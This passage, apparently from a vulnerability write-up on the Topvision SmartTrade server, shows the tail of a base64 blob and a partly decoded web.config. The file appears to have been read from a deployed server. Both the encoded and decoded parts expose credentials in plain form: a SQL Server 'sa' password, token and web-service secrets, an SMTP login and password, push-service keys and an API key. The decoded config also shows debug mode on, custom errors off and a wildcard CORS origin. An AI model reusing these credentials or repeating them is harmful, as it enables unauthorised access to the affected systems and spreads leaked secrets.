NCiAgICA8IS0tIOafpeivouaVsOaNruS7u+WKoeeUn+aIkEV4Y2xl5paH5Lu255uu5b2VIC0tPg0KICAgIDxhZGQga2V5PSJUYXNrRXhjZWxVcExvYWRQYXRoIiB2YWx1ZT0iRDpcVG9wdmlzaW9uXFNtYXJ0VHJhZGVTZXJ2ZXJcVXBMb2FkUGF0aFxUYXNrRXhjZWxVcExvYWRQYXRoIiAvPg0KICAgIDwhLS0g5pel5b+X6K6w5b2V57qn5YirIDA65LiN6K6w5b2VIDE6566A5Y2VIDI65aSN5p2CIDM65YWo6YOoIC0tPg0KICAgIDxhZGQga2V5PSJMb2dMZXZlbCIgdmFsdWU9IjEiIC8+DQogICAgPCEtLSDnmbvlvZXnqpflj6PmmL7npLrmoLflvI8gMDrpu5jorqQgMTrnroDljZUgMjrpmpDol48gLS0+DQogICAgPGFkZCBrZXk9IkxvZ2luRm9ybVN0eWxlIiB2YWx1ZT0iMCIgLz4NCiAgICA8IS0tIFNRTOaJp+ihjOi2heaXtuaXtumXtCAtLT4NCiAgICA8YWRkIGtleT0iU1FMQ29tbWFuZFJ1blRpbWVvdXQiIHZhbHVlPSIxMDAwIiAvPg0KICAgIDwhLS0g5bqU5pS25bqU5LuY5p+l6K+i5pe26YeR6aKd5bqU6K+l5Zub6IiN5LqU5YWl55qE5bCP5pWw54K5IC0tPg0KICAgIDxhZGQga2V5PSJTZWFyY2hGaW5hbmNpYWxMZW4iIHZhbHVlPSIzIiAvPg0KICAgIDwhLS0gIOi/nOeoi+WNj+WKqeacjeWKoeWVhiAwOnR0dm5jIDE6aW5mb2NhcmUgIC0tPg0KICAgIDxhZGQga2V5PSJWTkNTcG9uc29ySUQiIHZhbHVlPSIwIiAvPg0KICAgIDwhLS0gIOi/nOeoi+WNj+WKqeacjeWKoeWZqOWcsOWdgCAtLT4NCiAgICA8YWRkIGtleT0iVk5DU2VydmVyQWRkcmVzcyIgdmFsdWU9InZuYy5pdHMzNjUubmV0IiAvPg0KICAgIDwhLS0gIOi/nOeoi+WNj+WKqeacjeWKoeWZqOerr+WPoyAtLT4NCiAgICA8YWRkIGtleT0iVk5DU2VydmVyUG9ydCIgdmFsdWU9IjIzIiAvPg0KICAgIDwhLS0gIOW4ruWKqeaWh+aho+acjeWKoeWZqCAtLT4NCiAgICA8YWRkIGtleT0iSGVscFNlcnZlckFkZHJlc3MiIHZhbHVlPSJoZWxwLnRvcHZpc2lvbi5tZSIgLz4NCiAgICA8IS0tICDpgq7ku7bphY3nva4gU3RhcnQgLS0+DQogICAgPGFkZCBrZXk9IlVzZURlZmF1bHRDcmVkZW50aWFscyIgdmFsdWU9ImZhbHNlIiAvPg0KICAgIDxhZGQga2V5PSJTTVRQRW5hYmxlU1NMIiB2YWx1ZT0iVHJ1ZSIgLz4NCiAgICA8YWRkIGtleT0iU01UUEhvc3QiIHZhbHVlPSJzbXRwLnFxLmNvbSIgLz4NCiAgICA8YWRkIGtleT0iU01UUFBvcnQiIHZhbHVlPSI1ODciIC8+DQogICAgPGFkZCBrZXk9IlNNVFBVc2VyIiB2YWx1ZT0iMzA4MDAyNDQ1MkBxcS5jb20iIC8+DQogICAgPGFkZCBrZXk9IlNNVFBDQyIgdmFsdWU9IiIgLz4NCiAgICA8YWRkIGtleT0iU01UUFBhc3N3b3JkIiB2YWx1ZT0ib2ZwanlseHJiYXBlZGVhZSIgLz4NCiAgICA8YWRkIGtleT0iU01UUEZyb20iIHZhbHVlPSIzMDgwMDI0NDUyQHFxLmNvbSIgLz4NCiAgICA8IS0tICDpgq7ku7bphY3nva4gRW5kIC0tPg0KICAgIDwhLS0g5pu05paw5pyN5Yqh5omA5Zyo6Lev5b6EIC0tPg0KICAgIDxhZGQga2V5PSJVcGRhdGVTZXJ2aWNlUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXHVwZGF0ZSIgLz4NCiAgICA8IS0tIOWkh+S7veacjeWKoeaJgOWcqOi3r+W+hCAtLT4NCiAgICA8YWRkIGtleT0iQmFja3VwU2VydmljZVBhdGgiIHZhbHVlPSJEOlxUb3B2aXNpb25cU21hcnRUcmFkZVNlcnZlclxCYWNrdXAiIC8+DQogICAgPCEtLSDmtojmga/mnI3liqHmiYDlnKjot6/lvoQgLS0+DQogICAgPGFkZCBrZXk9Ik1lc3NhZ2VTZXJ2aWNlUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXE1lc3NhZ2UiIC8+DQogICAgPCEtLSDku7vliqHorqHliJLmnI3liqHmiYDlnKjot6/lvoQgLS0+DQogICAgPGFkZCBrZXk9IlRhc2tTZXJ2aWNlUGF0aCIgdmFsdWU9IkQ6XFRvcHZpc2lvblxTbWFydFRyYWRlU2VydmVyXFRhc2siIC8+DQogICAgPCEtLSBTYWZlTmV05Zyw5Z2AIC0tPg0KICAgIDxhZGQga2V5PSJTYWZlTmV0VXJpIiB2YWx1ZT0ibG9jYWxob3N0OjE5NDciIC8+DQogICAgPCEtLSAg55+t5L+h6YWN572uIFN0YXJ0IC0tPg0KICAgIDxhZGQga2V5PSJTTVNTZXJ2ZXIiIHZhbHVlPSJodHRwOi8vc21zLml0czM2NS5uZXQvU01TU2VuZC5hc3B4IiAvPg0KICAgIDxhZGQga2V5PSJTTVNVc2VyTmFtZSIgdmFsdWU9IiIgLz4NCiAgICA8YWRkIGtleT0iU01TUGFzc3dvcmQiIHZhbHVlPSIiIC8+DQogICAgPCEtLSAg5a6J5Y2T54mI5pysIC0tPg0KICAgIDxhZGQga2V5PSJBbmRSb2lkVmVyc2lvbiIgdmFsdWU9IjEuNi43LjQiIC8+DQogICAgPGFkZCBrZXk9IkFuZFJvaWREb3duTG9hZFVybCIgdmFsdWU9Imh0dHA6Ly93d3cuaXRzMzY1Lm5ldDo4MDgwLyIgLz4NCiAgICA8IS0tICDlronljZNBUFDniYjmnKwgLS0+DQogICAgPGFkZCBrZXk9IkFuZFJvaWRBUFBWZXJzaW9uIiB2YWx1ZT0iMS4xLjEiIC8+DQogICAgPGFkZCBrZXk9IkFuZFJvaWRBUFBEb3duTG9hZFVybCIgdmFsdWU9Imh0dHA6Ly93d3cuaXRzMzY1Lm5ldDo4MDgwLyIgLz4NCiAgICA8IS0tICBUVueJiOacrCAtLT4NCiAgICA8YWRkIGtleT0iVFZBcHBWZXJzaW9uIiB2YWx1ZT0iMS4wLjAuNyIgLz4NCiAgICA8YWRkIGtleT0iVFZBcHBWZXJzaW9uRG93bkxvYWRVcmwiIHZhbHVlPSJodHRwOi8vd3d3Lml0czM2NS5uZXQ6ODA4MC9UVi8iIC8+DQogICAgPCEtLSAg5raI5oGv5o6o6YCB54mI5pysIC0tPg0KICAgIDxhZGQga2V5PSJBUFBJRCIgdmFsdWU9IlFuelVNREdRaEs3MkFleU9MSWl5ejIiIC8+DQogICAgPGFkZCBrZXk9IkFQUEtFWSIgdmFsdWU9ImJ5NlR1bGFseks3NkZwQzQ1MExaeSIgLz4NCiAgICA8YWRkIGtleT0iTUFTVEVSU0VDUkVUIiB2YWx1ZT0ieWc5OFRMbEhITDZFdjA5UGg5ZzhINiIgLz4NCiAgICA8YWRkIGtleT0id2VicGFnZXM6RW5hYmxlZCIgdmFsdWU9ImZhbHNlIiAvPg0KICAgIDxhZGQga2V5PSJQcmVzZXJ2ZUxvZ2luVXJsIiB2YWx1ZT0idHJ1ZSIgLz4NCiAgICA8YWRkIGtleT0iQ2xpZW50VmFsaWRhdGlvbkVuYWJsZWQiIHZhbHVlPSJ0cnVlIiAvPg0KICAgIDxhZGQga2V5PSJVbm9idHJ1c2l2ZUphdmFTY3JpcHRFbmFibGVkIiB2YWx1ZT0idHJ1ZSIgLz4NCiAgICA8IS0tICAgWVVO5pyN5Yqh5omN5pyJ77yM5YW25a6D5pyN5Yqh5Zmo5Y+v5Yig6Zmk5oiW5YC8IOS4ujAgLS0+DQogICAgPGFkZCBrZXk9Ill1bkFQUCIgdmFsdWU9IjAiIC8+DQogICAgPCEtLSAgIEFQUCAtLT4NCiAgICA8YWRkIGtleT0iQXBwVXNlck51bSIgdmFsdWU9ImhlUTE3cjJsa3JNUURESU5HdjdUdHc9PSIgLz4NCiAgICA8YWRkIGtleT0iU2NhblVzZXJOdW0iIHZhbHVlPSJJRVE4MmRmeGdlZ1BQNHR2ZVZnampBPT0iIC8+DQogICAgPCEtLSDlupPlrZjnvJPlrZjlip/og70gIOm7mOiupDDkuI3lvIDlkK8gMeW8gOWQryAtLT4NCiAgICA8YWRkIGtleT0iUHJvZHVjdEludmVudG9yeUNhY2hlU2VydmVyIiB2YWx1ZT0iMCIgLz4NCiAgICA8YWRkIGtleT0iUHJvTWF0ZXJpZWxBcnJhbmdlRWZmZWN0IiB2YWx1ZT0iMCIgLz4NCiAgICA8IS0tIOWvueWkluW8gOaUvkFQSeWKoOWvhktFWSAtLT4NCiAgICA8YWRkIGtleT0iQVBJS0VZIiB2YWx1ZT0iYnk2VHVsYWw4NXpLNzZGcEMxNDUwTEZDWCIgLz4NCiAgPC9hcHBTZXR0aW5ncz4NCiAgPCEtLSDkuIvpnaLnmoTlnKjlpJrkuKrlrZDnm67lvZXmg4XlhrXkuIvpnIDopoEgLS0+DQogIDwhLS0gPGxvY2F0aW9uIHBhdGg9Ii4iIGFsbG93T3ZlcnJpZGU9ImZhbHNlIiBpbmhlcml0SW5DaGlsZEFwcGxpY2F0aW9ucz0iZmFsc2UiLz4gLS0+DQogIDxzeXN0ZW0ud2ViPg0KICAgIDwhLS0gPGdsb2JhbGl6YXRpb24gcmVxdWVzdEVuY29kaW5nPSJnYjIzMTIiIHJlc3BvbnNlRW5jb2Rpbmc9ImdiMjMxMiIgY3VsdHVyZT0iemgtQ04iIGZpbGVFbmNvZGluZz0iZ2IyMzEyIiAvPiAtLT4NCiAgICA8IS0tIDxnbG9iYWxpemF0aW9uIHJlcXVlc3RFbmNvZGluZz0idXRmLTgiIHJlc3BvbnNlRW5jb2Rpbmc9InV0Zi04Ii8+IC0tPg0KICAgIDxjdXN0b21FcnJvcnMgbW9kZT0iT2ZmIiBkZWZhdWx0UmVkaXJlY3Q9Ii9FcnJQYWdlIiAvPg0KICAgIDxjb21waWxhdGlvbiB0YXJnZXRGcmFtZXdvcms9IjQuMCIgLz4NCiAgICA8YXV0aGVudGljYXRpb24gbW9kZT0iTm9uZSIgLz4NCiAgICA8aHR0cFJ1bnRpbWUgbWF4UmVxdWVzdExlbmd0aD0iMTAyNDAwIiB1c2VGdWxseVF1YWxpZmllZFJlZGlyZWN0VXJsPSJmYWxzZSIgZXhlY3V0aW9uVGltZW91dD0iOTUxMjAwIiBtaW5GcmVlVGhyZWFkcz0iOCIgbWluTG9jYWxSZXF1ZXN0RnJlZVRocmVhZHM9IjQiIGFwcFJlcXVlc3RRdWV1ZUxpbWl0PSIxMDAwMCIgZW5hYmxlVmVyc2lvbkhlYWRlcj0idHJ1ZSIgLz4NCiAgICA8cGFnZXMgY29udHJvbFJlbmRlcmluZ0NvbXBhdGliaWxpdHlWZXJzaW9uPSI0LjAiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiPg0KICAgICAgPG5hbWVzcGFjZXM+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLkhlbHBlcnMiIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLk12YyIgLz4NCiAgICAgICAgPGFkZCBuYW1lc3BhY2U9IlN5c3RlbS5XZWIuTXZjLkFqYXgiIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLk12Yy5IdG1sIiAvPg0KICAgICAgICA8YWRkIG5hbWVzcGFjZT0iU3lzdGVtLldlYi5PcHRpbWl6YXRpb24iIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLlJvdXRpbmciIC8+DQogICAgICAgIDxhZGQgbmFtZXNwYWNlPSJTeXN0ZW0uV2ViLldlYlBhZ2VzIiAvPg0KICAgICAgPC9uYW1lc3BhY2VzPg0KICAgIDwvcGFnZXM+DQogICAgPHByb2ZpbGUgZGVmYXVsdFByb3ZpZGVyPSJEZWZhdWx0UHJvZmlsZVByb3ZpZGVyIj4NCiAgICAgIDxwcm92aWRlcnM+DQogICAgICAgIDxhZGQgbmFtZT0iRGVmYXVsdFByb2ZpbGVQcm92aWRlciIgdHlwZT0iU3lzdGVtLldlYi5Qcm92aWRlcnMuRGVmYXVsdFByb2ZpbGVQcm92aWRlciwgU3lzdGVtLldlYi5Qcm92aWRlcnMsIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1IiBjb25uZWN0aW9uU3RyaW5nTmFtZT0iRGVmYXVsdENvbm5lY3Rpb24iIGFwcGxpY2F0aW9uTmFtZT0iLyIgLz4NCiAgICAgIDwvcHJvdmlkZXJzPg0KICAgIDwvcHJvZmlsZT4NCiAgICA8bWVtYmVyc2hpcCBkZWZhdWx0UHJvdmlkZXI9IkRlZmF1bHRNZW1iZXJzaGlwUHJvdmlkZXIiPg0KICAgICAgPHByb3ZpZGVycz4NCiAgICAgICAgPGFkZCBuYW1lPSJEZWZhdWx0TWVtYmVyc2hpcFByb3ZpZGVyIiB0eXBlPSJTeXN0ZW0uV2ViLlByb3ZpZGVycy5EZWZhdWx0TWVtYmVyc2hpcFByb3ZpZGVyLCBTeXN0ZW0uV2ViLlByb3ZpZGVycywgVmVyc2lvbj0xLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUiIGNvbm5lY3Rpb25TdHJpbmdOYW1lPSJEZWZhdWx0Q29ubmVjdGlvbiIgZW5hYmxlUGFzc3dvcmRSZXRyaWV2YWw9ImZhbHNlIiBlbmFibGVQYXNzd29yZFJlc2V0PSJ0cnVlIiByZXF1aXJlc1F1ZXN0aW9uQW5kQW5zd2VyPSJmYWxzZSIgcmVxdWlyZXNVbmlxdWVFbWFpbD0iZmFsc2UiIG1heEludmFsaWRQYXNzd29yZEF0dGVtcHRzPSI1IiBtaW5SZXF1aXJlZFBhc3N3b3JkTGVuZ3RoPSI2IiBtaW5SZXF1aXJlZE5vbmFscGhhbnVtZXJpY0NoYXJhY3RlcnM9IjAiIHBhc3N3b3JkQXR0ZW1wdFdpbmRvdz0iMTAiIGFwcGxpY2F0aW9uTmFtZT0iLyIgLz4NCiAgICAgIDwvcHJvdmlkZXJzPg0KICAgIDwvbWVtYmVyc2hpcD4NCiAgICA8cm9sZU1hbmFnZXIgZGVmYXVsdFByb3ZpZGVyPSJEZWZhdWx0Um9sZVByb3ZpZGVyIj4NCiAgICAgIDxwcm92aWRlcnM+DQogICAgICAgIDxhZGQgbmFtZT0iRGVmYXVsdFJvbGVQcm92aWRlciIgdHlwZT0iU3lzdGVtLldlYi5Qcm92aWRlcnMuRGVmYXVsdFJvbGVQcm92aWRlciwgU3lzdGVtLldlYi5Qcm92aWRlcnMsIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1IiBjb25uZWN0aW9uU3RyaW5nTmFtZT0iRGVmYXVsdENvbm5lY3Rpb24iIGFwcGxpY2F0aW9uTmFtZT0iLyIgLz4NCiAgICAgIDwvcHJvdmlkZXJzPg0KICAgIDwvcm9sZU1hbmFnZXI+DQogICAgPCEtLSANCiAgICAgICAgICAgIElmIHlvdSBhcmUgZGVwbG95aW5nIHRvIGEgY2xvdWQgZW52aXJvbm1lbnQgdGhhdCBoYXMgbXVsdGlwbGUgd2ViIHNlcnZlciBpbnN0YW5jZXMsDQogICAgICAgICAgICB5b3Ugc2hvdWxkIGNoYW5nZSBzZXNzaW9uIHN0YXRlIG1vZGUgZnJvbSAiSW5Qcm9jIiB0byAiQ3VzdG9tIi4gSW4gYWRkaXRpb24sDQogICAgICAgICAgICBjaGFuZ2UgdGhlIGNvbm5lY3Rpb24gc3RyaW5nIG5hbWVkICJEZWZhdWx0Q29ubmVjdGlvbiIgdG8gY29ubmVjdCB0byBhbiBpbnN0YW5jZQ0KICAgICAgICAgICAgb2YgU1FMIFNlcnZlciAoaW5jbHVkaW5nIFNRTCBBenVyZSBhbmQgU1FMICBDb21wYWN0KSBpbnN0ZWFkIG9mIHRvIFNRTCBTZXJ2ZXIgRXhwcmVzcy4NCiAgICAgICAtLT4NCiAgICA8c2Vzc2lvblN0YXRlIG1vZGU9IkluUHJvYyIgdGltZW91dD0iMSIgY3VzdG9tUHJvdmlkZXI9IkRlZmF1bHRTZXNzaW9uUHJvdmlkZXIiPg0KICAgICAgPHByb3ZpZGVycz4NCiAgICAgICAgPGFkZCBuYW1lPSJEZWZhdWx0U2Vzc2lvblByb3ZpZGVyIiB0eXBlPSJTeXN0ZW0uV2ViLlByb3ZpZGVycy5EZWZhdWx0U2Vzc2lvblN0YXRlUHJvdmlkZXIsIFN5c3RlbS5XZWIuUHJvdmlkZXJzLCBWZXJzaW9uPTEuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNSIgY29ubmVjdGlvblN0cmluZ05hbWU9IkRlZmF1bHRDb25uZWN0aW9uIiAvPg0KICAgICAgPC9wcm92aWRlcnM+DQogICAgPC9zZXNzaW9uU3RhdGU+DQogIDwvc3lzdGVtLndlYj4NCiAgPHN5c3RlbS53ZWJTZXJ2ZXI+DQogICAgPGh0dHBQcm90b2NvbD4NCiAgICAgIDxjdXN0b21IZWFkZXJzPg0KICAgICAgICA8YWRkIG5hbWU9IkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbiIgdmFsdWU9IioiIC8+DQogICAgICAgIDxhZGQgbmFtZT0iQWNjZXNzLUNvbnRyb2wtTWF4LUFnZSIgdmFsdWU9IjMwIiAvPg0KICAgICAgICA8YWRkIG5hbWU9IkFjY2Vzcy1Db250cm9sLUFsbG93LU1ldGhvZHMiIHZhbHVlPSJHRVQsUE9TVCxPUFRJT05TIiAvPg0KICAgICAgICA8YWRkIG5hbWU9IkFjY2Vzcy1Db250cm9sLUFsbG93LUhlYWRlcnMiIHZhbHVlPSJDb250ZW50LVR5cGUsIEFjY2VwdCIgLz4NCiAgICAgIDwvY3VzdG9tSGVhZGVycz4NCiAgICA8L2h0dHBQcm90b2NvbD4NCiAgICA8dmFsaWRhdGlvbiB2YWxpZGF0ZUludGVncmF0ZWRNb2RlQ29uZmlndXJhdGlvbj0iZmFsc2UiIC8+DQogICAgPG1vZHVsZXMgcnVuQWxsTWFuYWdlZE1vZHVsZXNGb3JBbGxSZXF1ZXN0cz0idHJ1ZSIgLz4NCiAgICA8aGFuZGxlcnM+DQogICAgICA8cmVtb3ZlIG5hbWU9IkV4dGVuc2lvbmxlc3NVcmxIYW5kbGVyLUlTQVBJLTQuMF8zMmJpdCIgLz4NCiAgICAgIDxyZW1vdmUgbmFtZT0iRXh0ZW5zaW9ubGVzc1VybEhhbmRsZXItSVNBUEktNC4wXzY0Yml0IiAvPg0KICAgICAgPHJlbW92ZSBuYW1lPSJFeHRlbnNpb25sZXNzVXJsSGFuZGxlci1JbnRlZ3JhdGVkLTQuMCIgLz4NCiAgICAgIDxhZGQgbmFtZT0iRXh0ZW5zaW9ubGVzc1VybEhhbmRsZXItSVNBUEktNC4wXzMyYml0IiBwYXRoPSIqLiIgdmVyYj0iR0VULEhFQUQsUE9TVCxERUJVRyxQVVQsREVMRVRFLFBBVENILE9QVElPTlMiIG1vZHVsZXM9IklzYXBpTW9kdWxlIiBzY3JpcHRQcm9jZXNzb3I9IiV3aW5kaXIlXE1pY3Jvc29mdC5ORVRcRnJhbWV3b3JrXHY0LjAuMzAzMTlcYXNwbmV0X2lzYXBpLmRsbCIgcHJlQ29uZGl0aW9uPSJjbGFzc2ljTW9kZSxydW50aW1lVmVyc2lvbnY0LjAsYml0bmVzczMyIiByZXNwb25zZUJ1ZmZlckxpbWl0PSIwIiAvPg0KICAgICAgPGFkZCBuYW1lPSJFeHRlbnNpb25sZXNzVXJsSGFuZGxlci1JU0FQSS00LjBfNjRiaXQiIHBhdGg9IiouIiB2ZXJiPSJHRVQsSEVBRCxQT1NULERFQlVHLFBVVCxERUxFVEUsUEFUQ0gsT1BUSU9OUyIgbW9kdWxlcz0iSXNhcGlNb2R1bGUiIHNjcmlwdFByb2Nlc3Nvcj0iJXdpbmRpciVcTWljcm9zb2Z0Lk5FVFxGcmFtZXdvcms2NFx2NC4wLjMwMzE5XGFzcG5ldF9pc2FwaS5kbGwiIHByZUNvbmRpdGlvbj0iY2xhc3NpY01vZGUscnVudGltZVZlcnNpb252NC4wLGJpdG5lc3M2NCIgcmVzcG9uc2VCdWZmZXJMaW1pdD0iMCIgLz4NCiAgICAgIDxhZGQgbmFtZT0iRXh0ZW5zaW9ubGVzc1VybEhhbmRsZXItSW50ZWdyYXRlZC00LjAiIHBhdGg9IiouIiB2ZXJiPSJHRVQsSEVBRCxQT1NULERFQlVHLFBVVCxERUxFVEUsUEFUQ0gsT1BUSU9OUyIgdHlwZT0iU3lzdGVtLldlYi5IYW5kbGVycy5UcmFuc2ZlclJlcXVlc3RIYW5kbGVyIiBwcmVDb25kaXRpb249ImludGVncmF0ZWRNb2RlLHJ1bnRpbWVWZXJzaW9udjQuMCIgLz4NCiAgICA8L2hhbmRsZXJzPg0KICAgIDxzZWN1cml0eT4NCiAgICAgIDxyZXF1ZXN0RmlsdGVyaW5nIGFsbG93RG91YmxlRXNjYXBpbmc9InRydWUiIC8+DQogICAgPC9zZWN1cml0eT4NCiAgICA8c3RhdGljQ29udGVudD4NCiAgICAgIDxyZW1vdmUgZmlsZUV4dGVuc2lvbj0iLndvZmYiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIud29mZiIgbWltZVR5cGU9ImFwcGxpY2F0aW9uL3gtZm9udC13b2ZmIiAvPg0KICAgICAgPHJlbW92ZSBmaWxlRXh0ZW5zaW9uPSIud29mZjIiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIud29mZjIiIG1pbWVUeXBlPSJhcHBsaWNhdGlvbi94LWZvbnQtd29mZjIiIC8+DQogICAgICA8cmVtb3ZlIGZpbGVFeHRlbnNpb249Ii50dGYiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIudHRmIiBtaW1lVHlwZT0iYXBwbGljYXRpb24veC1mb250LXRydWV0eXBlIiAvPg0KICAgICAgPHJlbW92ZSBmaWxlRXh0ZW5zaW9uPSIuc3ZnIiAvPg0KICAgICAgPG1pbWVNYXAgZmlsZUV4dGVuc2lvbj0iLnN2ZyIgbWltZVR5cGU9ImltYWdlL3N2Zyt4bWwiIC8+DQogICAgICA8cmVtb3ZlIGZpbGVFeHRlbnNpb249Ii5vdGYiIC8+DQogICAgICA8bWltZU1hcCBmaWxlRXh0ZW5zaW9uPSIub3RmIiBtaW1lVHlwZT0iYXBwbGljYXRpb24veC1mb250LW9wZW50eXBlIiAvPg0KICAgICAgPHJlbW92ZSBmaWxlRXh0ZW5zaW9uPSIuZW90IiAvPg0KICAgICAgPG1pbWVNYXAgZmlsZUV4dGVuc2lvbj0iLmVvdCIgbWltZVR5cGU9ImFwcGxpY2F0aW9uL3ZuZC5tcy1mb250b2JqZWN0IiAvPg0KICAgIDwvc3RhdGljQ29udGVudD4NCiAgPC9zeXN0ZW0ud2ViU2VydmVyPg0KICA8cnVudGltZT4NCiAgICA8YXNzZW1ibHlCaW5kaW5nIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MSI+DQogICAgICA8ZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICAgIDxhc3NlbWJseUlkZW50aXR5IG5hbWU9IlN5c3RlbS5XZWIuSGVscGVycyIgcHVibGljS2V5VG9rZW49IjMxYmYzODU2YWQzNjRlMzUiIC8+DQogICAgICAgIDxiaW5kaW5nUmVkaXJlY3Qgb2xkVmVyc2lvbj0iMS4wLjAuMC0yLjAuMC4wIiBuZXdWZXJzaW9uPSIyLjAuMC4wIiAvPg0KICAgICAgPC9kZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgIDxkZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgbmFtZT0iU3lzdGVtLldlYi5NdmMiIHB1YmxpY0tleVRva2VuPSIzMWJmMzg1NmFkMzY0ZTM1IiAvPg0KICAgICAgICA8YmluZGluZ1JlZGlyZWN0IG9sZFZlcnNpb249IjEuMC4wLjAtNC4wLjAuMCIgbmV3VmVyc2lvbj0iNC4wLjAuMCIgLz4NCiAgICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICA8ZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICAgIDxhc3NlbWJseUlkZW50aXR5IG5hbWU9IlN5c3RlbS5XZWIuV2ViUGFnZXMiIHB1YmxpY0tleVRva2VuPSIzMWJmMzg1NmFkMzY0ZTM1IiAvPg0KICAgICAgICA8YmluZGluZ1JlZGlyZWN0IG9sZFZlcnNpb249IjEuMC4wLjAtMi4wLjAuMCIgbmV3VmVyc2lvbj0iMi4wLjAuMCIgLz4NCiAgICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICA8ZGVwZW5kZW50QXNzZW1ibHk+DQogICAgICAgIDxhc3NlbWJseUlkZW50aXR5IG5hbWU9IldlYkdyZWFzZSIgcHVibGljS2V5VG9rZW49IjMxYmYzODU2YWQzNjRlMzUiIC8+DQogICAgICAgIDxiaW5kaW5nUmVkaXJlY3Qgb2xkVmVyc2lvbj0iMC4wLjAuMC0xLjMuMC4wIiBuZXdWZXJzaW9uPSIxLjMuMC4wIiAvPg0KICAgICAgPC9kZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgIDxkZXBlbmRlbnRBc3NlbWJseT4NCiAgICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgbmFtZT0iTmV3dG9uc29mdC5Kc29uIiBwdWJsaWNLZXlUb2tlbj0iMzBhZDRmZTZiMmE2YWVlZCIgY3VsdHVyZT0ibmV1dHJhbCIgLz4NCiAgICAgICAgPGJpbmRpbmdSZWRpcmVjdCBvbGRWZXJzaW9uPSIwLjAuMC4wLTExLjAuMC4wIiBuZXdWZXJzaW9uPSIxMC4wLjAuMCIgLz4NCiAgICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogICAgPC9hc3NlbWJseUJpbmRpbmc+DQogIDwvcnVudGltZT4NCiAgPGVudGl0eUZyYW1ld29yaz4NCiAgICA8ZGVmYXVsdENvbm5lY3Rpb25GYWN0b3J5IHR5cGU9IlN5c3RlbS5EYXRhLkVudGl0eS5JbmZyYXN0cnVjdHVyZS5Mb2NhbERiQ29ubmVjdGlvbkZhY3RvcnksIEVudGl0eUZyYW1ld29yayI+DQogICAgICA8cGFyYW1ldGVycz4NCiAgICAgICAgPHBhcmFtZXRlciB2YWx1ZT0idjEzLjAiIC8+DQogICAgICA8L3BhcmFtZXRlcnM+DQogICAgPC9kZWZhdWx0Q29ubmVjdGlvbkZhY3Rvcnk+DQogIDwvZW50aXR5RnJhbWV3b3JrPg0KPC9jb25maWd1cmF0aW9uPg==
```
base64解码
```java
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<configuration>
  <configSections>
    
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=4.4.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
  </configSections>
  <connectionStrings />
  <appSettings>
    <add key="vs:EnableBrowserLink" value="false" />
    
    <add key="ReportConnectString" value="Data Source=127.0.0.1,14330;Initial Catalog=SmartTrade_A3_Report;Persist Security Info=True;User ID=sa;Password=topvision_its365" />
    <add key="ConnectString" value="Data Source=127.0.0.1,14330;Initial Catalog=SmartTrade_A3;Persist Security Info=True;User ID=sa;Password=topvision_its365" />
    
    <add key="Debug" value="True" />
    
    <add key="HaspID" value="" />
    
    <add key="ServerVersion" value="12.0.6.0" />
    
    <add key="SuperUserIkeyCode" value="70480000FFFFC5BB" />
    
    <add key="CurrencyLen" value="4" />
    <add key="PriceLen" value="6" />
    <add key="QtyLen" value="0" />
    <add key="AmountLen" value="2" />
    
    <add key="CurrencyFormat" value="#,##0.####" />
    <add key="PriceFormat" value="#,##0.000000" />
    <add key="QtyFormat" value="#,##0" />
    <add key="AmountFormat" value="#,##0.00" />
    
    <add key="TokenKey" value="IuKJd8909" />
    <add key="WebServicePassword" value="{ac80457b-368d-4062-b2dd-ae4d490e1c4b}" />
    
    <add key="USBKEY" value="False" />
    
    <add key="MessageTimeInterval" value="30" />
    
    <add key="ScheduleAssemblySetting" value="Fes.Schedule_Customize.exe;Fes.Schedule_Customize.frmScheduleList" />
    
    <add key="ClientUpdateURL" value="http://update.its365.net" />
    
    <add key="EnableCustomerBranch" value="False" />
    
    <add key="EnableSupplierBranch" value="False" />
    
    
    <add key="RptFileFolder" value="D:\Topvision\SmartTradeServer\UpLoadPath\rpt" />
    
    <add key="UpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath" />
    
    <add key="PersonalDocumentUpLoadPath" value="D:\Topvision\SmartTradeServer\UpLoadPath\PersonalDocument" />
    
    <add key="EduUpLoadPath" value="D:\EduUpLoadPath" />
    
